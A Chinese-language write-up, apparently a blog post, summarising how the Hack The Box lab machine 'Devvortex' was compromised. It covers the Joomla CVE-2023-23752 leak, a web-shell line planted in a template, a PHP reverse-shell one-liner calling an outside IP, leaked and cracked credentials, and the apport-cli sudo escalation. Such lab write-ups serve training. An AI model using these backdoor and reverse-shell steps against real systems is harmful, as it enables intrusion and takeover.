HTB - Devvortex 靶機滲透
靶場地址
過關條件
- user flag
- root flag
速記
- 資訊蒐集階段
- 開放Port:22、80
- 有設定vhost ->
devvortex.htb - 進行目錄爆破沒有可用線索
- 進行子域名爆破獲得 ->
dev.devvortex.htb - 針對
dev.devvortex.htb-> 獲得 ``/administrator```目錄 - 連線至
/administrator發現是Joomla框架- 使用
http://dev.devvortex.htb/administrator/manifests/files/joomla.xml得知Joomla版本號4.2.6 - 該版本有 CVE-2023-23752 漏洞
- 可用這個 [exploit] (https://github.com/Acceis/exploit-CVE-2023-23752)
- 攻擊後,發現資料庫的帳號密碼,等同於網站登入的帳號密碼
lewis:P4ntherg0t1n5r3c0n## - 進入後台後,尋找template設定頁面,寫入
system($_GET['cmd']);注入後門 - 使用
php -r '$sock=fsockopen("10.10.14.90",4444);system("bash <&3 >&3 2>&3");'來拿到Reverse shell
- 使用
- 進入主機階段
- user flag
- 剛進入主機,拿到權限是
www-data,權限過低 - 連到剛剛爆破的資料庫,從
sd4fg_users取得logan的密碼```$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 - 使用hashid確認密碼格式,得知加密
bcrypt - 使用HashCat進行爆破,得到密碼
tequieromucho - 嘗試使用
logan:tequieromucho進行SSH登入,可正常登入
- 剛進入主機,拿到權限是
- root flag
- 使用
sudo -l確認目前使用者權限,得知(ALL : ALL) /usr/bin/apport-cli - 檢查
apport-cli版本號,版本號:2.20.11- 該版本有CVE-2023–1326 漏洞,可根據前面的網站直接使用
- 使用
- user flag
滲透過程
閱讀限制
滲透過程有受到作者設定的閱讀限制...